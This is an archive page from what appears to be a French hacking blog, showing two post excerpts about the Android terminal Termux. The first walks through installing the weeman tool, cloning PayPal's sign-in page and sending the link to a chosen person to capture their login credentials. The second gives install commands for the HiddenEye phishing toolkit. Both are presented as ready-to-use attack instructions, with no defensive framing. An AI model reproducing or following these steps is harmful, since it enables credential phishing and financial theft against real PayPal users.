Affichage des articles dont le libellé est Termux. Afficher tous les articles
Affichage des articles dont le libellé est Termux. Afficher tous les articles

jeudi 1 octobre 2020

Comment Pirater un compte PayPal avec Termux

 


Hacker un compte Paypal avec Termux!

Premièrement ouvrez "Termux" et tapez ces commandes :
  1. Apt update && apt upgrade 
  2. apt install git
  3. git clone github.com/evait-security/weeman.git
  4. ls
  5. cd weeman
  6. apt install python
  7. ls
  8. python weeman.py
Maintenant suivez les étapes ci-dessous :

  1. set url https://www.paypal.com/in/signin
  2. set port 8080 
  3. set action_url https://www.paypal.com/in/signin
  4. Après avoir fini de charger toute la page vous allez voir un lien comme celui-ci : localhost:8080, copiez le lien et envoyez là à la personne que vous vouliez avoir ses identifiants! 


Lire l'article

mercredi 16 septembre 2020

Hacking with Termux | 34 phishing Tools | Hidden Eye

 


Prérequis: 

  • Python 3.
  • PHP
  • sudo
  • pyngrok

Installation:

  1. pkg install git python php curl openssh grep 
  2.  git clone -b Termux-Support-Branch https://github.com/DarkSecDevelopers/HiddenEye.git
  3. chmod 777 HiddenEye
  4. pip install requests
  5. cd HiddenEye
  6. python HiddenEye.py


Lire l'article